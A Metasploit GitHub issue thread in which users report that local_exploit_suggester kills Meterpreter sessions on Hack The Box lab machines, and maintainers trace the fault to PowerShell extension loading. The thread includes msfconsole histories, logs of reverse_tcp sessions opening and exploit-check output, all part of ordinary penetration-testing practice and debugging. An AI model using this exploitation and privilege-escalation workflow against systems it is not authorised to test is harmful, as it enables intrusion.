rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

"Meterpreter Session Dies" when running the post module "local_exploit_suggester" #15943

Closed yaseenit7 closed 2 years ago

yaseenit7 commented 2 years ago

Steps to reproduce

How'd you do it?

  1. ...Gained initial access on "Hack the box Machine:Granny" using meterpreter session
  2. ...Later, when trying to run exploit suggester for privilege escalation, the meterpreter session dies, as often as several times when I keep trying.

This section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions.

Were you following a specific guide/tutorial or reading documentation?

If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.

Expected behavior

What should happen? The suggester should list the possible exploits for privilege escalation which are potentially exploitable

Current behavior

What happens instead? It doesn't list anything; rather, it kills the meterpreter session, probably

Metasploit version

Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).

Framework: 6.1.14-dev, Console: 6.1.14-dev

Additional Information

If your version is less than 5.0.96, please update to the latest version and ensure your issue is still present.

If the issue is encountered within msfconsole, please run the debug command using the instructions below. If the issue is encountered outside msfconsole, or the issue causes msfconsole to crash on startup, please delete this section.

  1. Start msfconsole
  2. Run the command set loglevel 3
  3. Take the steps necessary to recreate your issue
  4. Run the debug command
  5. Copy all the output below the ===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<=== line and make sure to REMOVE ANY SENSITIVE INFORMATION.

Here is proof that while running suggester, the Meterpreter session 1 closed. Reason: Died... then I ran the debug command

```
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - Meterpreter session 1 closed. Reason: Died
^C[-] 10.10.10.14 - Post interrupted by the console user
[*] Post module execution completed

msf6 post(multi/recon/local_exploit_suggester) > debug
Please provide the below information in any Github issues you open. New issues can be opened here https://github.com/rapid7/metasploit-framework/issues/new/choose
ENSURE YOU HAVE REMOVED ANY SENSITIVE INFORMATION BEFORE SUBMITTING!
```

===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

```
[framework/core]
loglevel=3

[framework/database/sr2Oacb8]
url=[Filtered]

[framework/ui/console]
ActiveModule=post/multi/recon/local_exploit_suggester

[multi/recon/local_exploit_suggester]
WORKSPACE=
VERBOSE=true
SESSION=1
SHOWDESCRIPTION=false
```

History

The following commands were ran during the session and before this issue occurred:

```
1305 set loglevel 3
1306 options
1307 search iis 6.0
1308 use 2
1309 set rhosts 10.10.10.14
1310 set lhost tun0
1311 run
1312 oiptions
1313 options
1314 exploit
1315 set targeturi /_vti_bin/
1316 options
1317 run
1318 debug
1319 sessions
1320 sessions -i 1
1321 search suggester
1322 use 0
1323 options
1324 set session 1
1325 set verbose true
1326 run
1327 debug
```

Framework Errors

The following framework errors occurred before the issue occurred:

```
[12/08/2021 00:12:14] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[12/08/2021 00:13:29] [e(0)] core: Error loading sysinfo - Rex::Post::Meterpreter::RequestError stdapi_sys_config_getuid: Operation failed: Access is denied.
[12/08/2021 00:14:12] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[12/08/2021 00:14:24] [e(0)] meterpreter: stdapi_sys_config_getuid: Operation failed: Access is denied.
[12/08/2021 14:44:07] [e(0)] meterpreter: Error running command shell: Rex::TimeoutError Operation timed out.
[12/08/2021 14:52:28] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[12/08/2021 14:54:13] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[12/08/2021 15:21:56] [e(0)] core: Error loading sysinfo - Rex::Post::Meterpreter::RequestError stdapi_sys_config_getuid: Operation failed: Access is denied.
[12/08/2021 15:30:57] [e(0)] core: Error loading sysinfo - Rex::Post::Meterpreter::RequestError stdapi_sys_config_getuid: Operation failed: Access is denied.
[12/08/2021 15:41:54] [e(0)] core: Exploit failed (windows/iis/iis_webdav_scstoragepathfromurl): Interrupt - Interrupt
Call stack:
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:267:in `connect'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:267:in `block in create_by_type'
/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'
/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'
/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'
/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:266:in `create_by_type'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
/usr/share/metasploit-framework/lib/rex/proto/http/client.rb:174:in `connect'
/usr/share/metasploit-framework/lib/rex/proto/http/client.rb:251:in `send_request'
/usr/share/metasploit-framework/lib/rex/proto/http/client.rb:232:in `_send_recv'
/usr/share/metasploit-framework/lib/rex/proto/http/client.rb:209:in `send_recv'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:374:in `send_request_raw'
/usr/share/metasploit-framework/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb:240:in `block in exploit'
/usr/share/metasploit-framework/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb:200:in `upto'
/usr/share/metasploit-framework/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb:200:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:215:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:168:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:177:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:562:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:511:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:505:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:505:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
```

Web Service Errors

The following web service errors occurred before the issue occurred:

```
msf-ws.log does not exist.
```

Framework Logs

The following framework logs were recorded before the issue occurred:

```
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms09_050_smb2_negotiate_func_index. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms10_046_shortcut_icon_dllloader. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms10_061_spoolss. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms15_020_shortcut_icon_dllloader. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms17_010_eternalblue. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/ms17_010_psexec. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/netidentity_xtierrpcpipe. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/psexec. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/smb_delivery. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/smb_doublepulsar_rce. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/smb_relay. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/smb_rras_erraticgopher. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/timbuktu_plughntcommand_bof. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smb/webexec. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/mailcarrier_smtp_ehlo. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/mercury_cram_md5. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/ms03_046_exchange2000_xexch50. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/njstar_smtp_bof. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/sysgauge_client_bof. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/wmailserver. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/smtp/ypops_overflow1. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/freeftpd_key_exchange. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/freesshd_authbypass. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/freesshd_key_exchange. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/putty_msg_debug. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/securecrt_ssh1. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssh/sysax_ssh_username. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/ssl/ms04_011_pct. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/telnet/gamsoft_telsrv_username. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/telnet/goodtech_telnet. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/attftp_long_filename. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/distinct_tftp_traversal. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/dlink_long_filename. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/futuresoft_transfermode. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/netdecision_tftp_traversal. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/opentftp_error_code. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/quick_tftp_pro_mode. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/tftpd32_long_filename. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/tftpdwin_long_filename. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/tftpserver_wrq_bof. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/tftp/threectftpsvc_long_mode. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/unicenter/cam_log_security. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/vnc/realvnc_client. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/vnc/ultravnc_client. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/vnc/ultravnc_viewer_bof. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/vnc/winvnc_http_get. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/vpn/safenet_ike_11. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/winrm/winrm_script_exec. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:45] [i(2)] core: Reloading exploit module windows/wins/ms04_045_wins. Ambiguous module warnings are safe to ignore
[12/08/2021 15:48:59] [w(0)] core: Session 1 has died
```

Web Service Logs

The following web service logs were recorded before the issue occurred:

```
msf-ws.log does not exist.
```

Version/Install

The versions and install method of your Metasploit setup:

```
Framework: 6.1.14-dev
Ruby: ruby 2.7.3p183 (2021-04-05 revision 6847ee089d) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Other - Please specify
```

bcoles commented 2 years ago

Please post the output when running local_exploit_suggester with set verbose true.

yaseenit7 commented 2 years ago

> Please post the output when running local_exploit_suggester with set verbose true.

I did that "set verbose true" but it didn't display anything. Please find the image below

image

bcoles commented 2 years ago

> I did that "set verbose true" but it didn't display anything. Please find the image below

Strange. The module must be dying in setup before trying (or even listing) the exploits it is going to check. Is session 1 a valid session? If so, what kind of session/payload?

I can't reproduce this on Windows 7 SP1 with a windows/meterpreter/reverse_tcp payload.

msf6 exploit(multi/handler) > 
[*] Sending stage (175174 bytes) to 172.16.191.236
[*] Meterpreter session 1 opened (172.16.191.192:1337 -> 172.16.191.236:57997 ) at 2021-12-09 09:49:04 -0500

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > set verbose true
verbose => true
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 172.16.191.236 - Collecting local exploits for x86/windows...
[*] 172.16.191.236 - The following 4 exploit checks are being tried:
[*] 172.16.191.236 - exploit/windows/local/adobe_sandbox_adobecollabsync
[*] 172.16.191.236 - exploit/windows/local/always_install_elevated
[*] 172.16.191.236 - exploit/windows/local/ms10_092_schelevator
[*] 172.16.191.236 - exploit/windows/local/panda_psevents
[*] 172.16.191.236 - exploit/windows/local/adobe_sandbox_adobecollabsync: Cannot reliably check exploitability.
[*] 172.16.191.236 - exploit/windows/local/always_install_elevated: The target is not exploitable.
[+] 172.16.191.236 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] 172.16.191.236 - exploit/windows/local/panda_psevents: The target is not exploitable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > 

Nor with a windows/x64/meterpreter/reverse_tcp payload.

msf6 exploit(multi/handler) > 
[*] Sending stage (200262 bytes) to 172.16.191.236
[*] Meterpreter session 1 opened (172.16.191.192:1337 -> 172.16.191.236:58012 ) at 2021-12-09 09:51:05 -0500

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > set verbose true
verbose => true
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 172.16.191.236 - Collecting local exploits for x64/windows...
[*] 172.16.191.236 - The following 3 exploit checks are being tried:
[*] 172.16.191.236 - exploit/windows/local/always_install_elevated
[*] 172.16.191.236 - exploit/windows/local/ms10_092_schelevator
[*] 172.16.191.236 - exploit/windows/local/virtual_box_opengl_escape
[*] 172.16.191.236 - exploit/windows/local/always_install_elevated: The target is not exploitable.
[+] 172.16.191.236 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] 172.16.191.236 - exploit/windows/local/virtual_box_opengl_escape: The target is not exploitable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > 

Someone else posted an issue (#15907) about local exploit suggester killing their Linux session recently. I could not reproduce that issue either.

dwelch-r7 commented 2 years ago

Hey @yaseenit7 I tested this with version 6.1.14 like you did against the HTB Granny box and it worked for me too, I followed the official guide provided by HTB, did you use that one too or did you try another method?

yaseenit7 commented 2 years ago

@dwelch-r7 which official guide are you talking about, you mean the Official HTB Write-up?... I did htb arctic box today still the same issue with arctic box (session dies and not stable). I think there is some mess with my machine's metasploit framework. I would like to restore to default or reinstall the metasploit would be better thing to do...Would you please suggest the steps either to restore as fresh metasploit or reinstall as fresh....

gwillcox-r7 commented 2 years ago

> @dwelch-r7 which official guide are you talking about, you mean the Official HTB Write-up?... I did htb arctic box today still the same issue with arctic box (session dies and not stable). I think there is some mess with my machine's metasploit framework. I would like to restore to default or reinstall the metasploit would be better thing to do...Would you please suggest the steps either to restore as fresh metasploit or reinstall as fresh....

To install fresh, you can grab an installer from https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers or follow the directions at https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment

dwelch-r7 commented 2 years ago

@yaseenit7 yes sorry I meant the Official HTB Write up from here https://app.hackthebox.com/machines/Granny/walkthroughs if that works for you then the problem probably isn't with the exploit suggester but maybe your original session is unstable

king0ni commented 2 years ago

Also experiencing same issue on HTB Arctic on a fresh build of Kali 5.15.0 with Meterpreter 6.1.21-dev. Have used both windows/x64/meterpreter/reverse_tcp and windows/meterpreter/reverse_tcp payloads (migrating to an x64 service). In both cases, session dies 100% of the time when running local_exploit_suggester, but the shells are stable doing anything else I've tried. Seems it's complaining that post/multi/recon/local_exploit_suggester can't be clearly found, though I can 'use' the module, configure it and make it start to run. Any way I can help provide further info or try anything to narrow this down?

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.11 - Collecting local exploits for x64/windows...

[*] 10.10.10.11 - Meterpreter session 1 closed. Reason: Died
[-] 10.10.10.11 - Session not found

Some Debug output below:

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

```
[framework/core]
RHOSTS=10.10.10.11
lhost=tun0

[framework/ui/console]
ActiveModule=post/multi/recon/local_exploit_suggester

[multi/recon/local_exploit_suggester]
WORKSPACE=
VERBOSE=true
SESSION=1
SHOWDESCRIPTION=false
```

Framework Errors

```
[01/05/2022 00:51:09] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/05/2022 00:52:51] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/05/2022 00:52:51] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/05/2022 00:56:19] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/05/2022 00:56:19] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/05/2022 00:57:36] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/05/2022 00:57:36] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/05/2022 01:03:26] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/05/2022 01:03:26] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/05/2022 01:23:31] [e(0)] meterpreter: Failed to load extension: No module of the name post/multi/recon/local_exploit_suggester found
```

Web Service Errors

The following web service errors occurred before the issue occurred:

```
msf-ws.log does not exist.
```

Framework logs

```
[01/05/2022 00:38:49] [d(0)] core: HistoryManager.push_context name: :msfconsole
[01/05/2022 00:51:09] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/05/2022 00:51:09] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/05/2022 00:52:51] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/05/2022 00:52:51] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/05/2022 00:56:19] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/05/2022 00:56:19] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/05/2022 00:57:36] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/05/2022 00:57:36] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/05/2022 01:03:26] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/05/2022 01:03:26] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/05/2022 01:04:15] [d(0)] core: HistoryManager.push_context name: :meterpreter
[01/05/2022 01:07:39] [d(0)] core: Reloading module post/multi/recon/local_exploit_suggester...
[01/05/2022 01:07:39] [w(0)] core: The module multi/recon/local_exploit_suggester is ambiguous with multi/recon/local_exploit_suggester.
[01/05/2022 01:07:39] [d(0)] core: Refreshing multi/recon/local_exploit_suggester of type: post
[01/05/2022 01:07:55] [w(0)] core: Session 1 has died
```

Version/Install

```
Framework: 6.1.21-dev
Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
```

bcoles commented 2 years ago

> Any way I can help provide further info or try anything to narrow this down?

Was the session valid? ie; were you able to run commands on the session before trying the local exploit suggester module?

Try running with set verbose true to see if it is failing on a particular module.

king0ni commented 2 years ago

> > Any way I can help provide further info or try anything to narrow this down?
>
> Was the session valid? ie; were you able to run commands on the session before trying the local exploit suggester module?
>
> Try running with set verbose true to see if it is failing on a particular module.

Yes, sessions were valid. I could sit there and run all sorts of commands for 20+ minutes and never an issue. Have tried this at least 10 times now on different days. If you expand the excerpt of debug info in my above post you will see where it shows verbose was set to true, but not much more info.

The last messages right before it dies are:

```
[01/05/2022 01:07:39] [d(0)] core: Reloading module post/multi/recon/local_exploit_suggester...
[01/05/2022 01:07:39] [w(0)] core: The module multi/recon/local_exploit_suggester is ambiguous with multi/recon/local_exploit_suggester.
[01/05/2022 01:07:39] [d(0)] core: Refreshing multi/recon/local_exploit_suggester of type: post
```
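
The manual triage in the comment above (reading the framework log entries logged just before the session died) can be scripted. This is an added example, not part of the original thread or of Metasploit; the function names and the 30-second window are assumptions, and the sample log is constructed from entries quoted in this issue.

```ruby
require 'time'

# Constructed sample: framework log entries copied from the excerpt quoted in this thread.
SAMPLE_LOG = <<~LOG
  [01/05/2022 01:03:26] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
  [01/05/2022 01:04:15] [d(0)] core: HistoryManager.push_context name: :meterpreter
  [01/05/2022 01:07:39] [d(0)] core: Reloading module post/multi/recon/local_exploit_suggester...
  [01/05/2022 01:07:39] [w(0)] core: The module multi/recon/local_exploit_suggester is ambiguous with multi/recon/local_exploit_suggester.
  [01/05/2022 01:07:39] [d(0)] core: Refreshing multi/recon/local_exploit_suggester of type: post
  [01/05/2022 01:07:55] [w(0)] core: Session 1 has died
LOG

# Zero-width split point in front of every "[MM/DD/YYYY HH:MM:SS] [x(n)]" prefix.
ENTRY_START = /(?=\[\d{2}\/\d{2}\/\d{4} \d{2}:\d{2}:\d{2}\] \[[a-z]\(\d\)\] )/
# One whole entry; /m lets the message keep continuation lines such as call stacks.
ENTRY_RE = /\A\[(\d{2}\/\d{2}\/\d{4} \d{2}:\d{2}:\d{2})\] \[([a-z])\((\d)\)\] (\w+): (.*)\z/m
DIED_RE = /\ASession (\d+) has died/

Entry = Struct.new(:time, :level, :verbosity, :source, :message)

# Parse framework log text into entries. Works on a normal log file and on
# text flattened onto one line (as pasted in the issue), because it splits in
# front of each timestamp rather than on newlines.
def parse_entries(text)
  text.split(ENTRY_START).filter_map do |chunk|
    m = ENTRY_RE.match(chunk.strip)
    next unless m

    Entry.new(Time.strptime(m[1], '%m/%d/%Y %H:%M:%S'), m[2], m[3].to_i, m[4], m[5])
  end
end

# For every "Session N has died" entry, collect the entries logged during the
# `window` seconds before it (hypothetical helper; the window is an assumption).
def context_before_deaths(entries, window: 30)
  entries.each_with_index.filter_map do |entry, i|
    m = DIED_RE.match(entry.message)
    next unless m

    prior = entries[0...i].select { |p| entry.time - p.time <= window }
    { session: m[1].to_i, died_at: entry.time, context: prior }
  end
end

if __FILE__ == $PROGRAM_NAME
  context_before_deaths(parse_entries(SAMPLE_LOG)).each do |death|
    puts "Session #{death[:session]} died at #{death[:died_at].strftime('%H:%M:%S')}; preceding entries:"
    death[:context].each { |e| puts "  [#{e.level}] #{e.source}: #{e.message}" }
  end
end
```
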

dwelch-r7 commented 2 years ago

hey @king0ni thank you for the feedback I think I've managed to replicate the issue now, seems like sometimes when checking for session compatibility we try to load the powershell extension and that's killing the session, not sure why yet but I'll keep digging

king0ni commented 2 years ago

> hey @king0ni thank you for the feedback I think I've managed to replicate the issue now, seems like sometimes when checking for session compatibility we try to load the powershell extension and that's killing the session, not sure why yet but I'll keep digging

Thanks @dwelch-r7 that's great news! Some info that might be helpful for you is that I have noticed any time I take an action on this particular machine (Arctic) to use or load PowerShell (whether in or outside of meterpreter), it kills the meterpreter channel or for a non-meterpreter shell it freezes and kills it. I've experienced this with PowerShell happen on some other VMs and was assuming this happens with PowerShell as part of some security function taking place (Defender?) Is responsive PowerShell a dependency of local_exploit_suggester module?

dwelch-r7 commented 2 years ago

You're spot on with the underlying cause, yea: attempting to load powershell is what is causing the session to die. The local_exploit_suggester, in an attempt to filter out which modules do/don't work for that session, is trying to load powershell on the session. If you remove powershell_execute from the Compat sections of cve_2020_1337_printerdemon.rb and tokenmagic.rb and then run local_exploit_suggester, it should no longer fail, if you need a temp workaround.

yaseenit7 commented 2 years ago

@dwelch-r7 yesss, the issue has been fixed. Thanks a lot for solving. Removed the "powershell_execute" string from the 2 files and tried in both granny and arctic htb boxes, the session was not terminated.

But there is one caveat I have noticed after running suggester, i.e., only a few exploit checks are being tried, like just 3 exploit checks [Image 1]. However, it needs to check more than 10 exploit checks. This has been confirmed from an internet blog's walkthrough screenshot [Image 2] and the link given below. I appreciate your consideration on this too. My anticipation was that it could be because we removed the "powershell_execute" string, probably.

[Image 1] image

[Image 2] https://dev.to/artis3n/writeup-hackthebox-arctic-with-metasploit-oi image

dwelch-r7 commented 2 years ago

@yaseenit7 glad that worked for ya! yea that's something we're aware of already it's being tracked here https://github.com/rapid7/metasploit-framework/issues/15949

yaseenit7 commented 2 years ago

@dwelch-r7 Oh ok let me catch up there.

bcoles commented 2 years ago

I believe this has been fixed in metasploit-payloads version 2.0.69 in https://github.com/rapid7/metasploit-payloads/pull/522 a couple of weeks ago.

The version of metasploit-payloads in use within Metasploit was bumped to version 2.0.69 in #16095 a few days ago. This issue should be patched in the weekly release on Friday.

Edit: It should already be fixed on master if you're using the git repo.

bcoles commented 2 years ago

This issue has been resolved.

> But there is one caveat I have noticed after running suggester, i.e., only a few exploit checks are being tried, like just 3 exploit checks

This is tracked in #15949.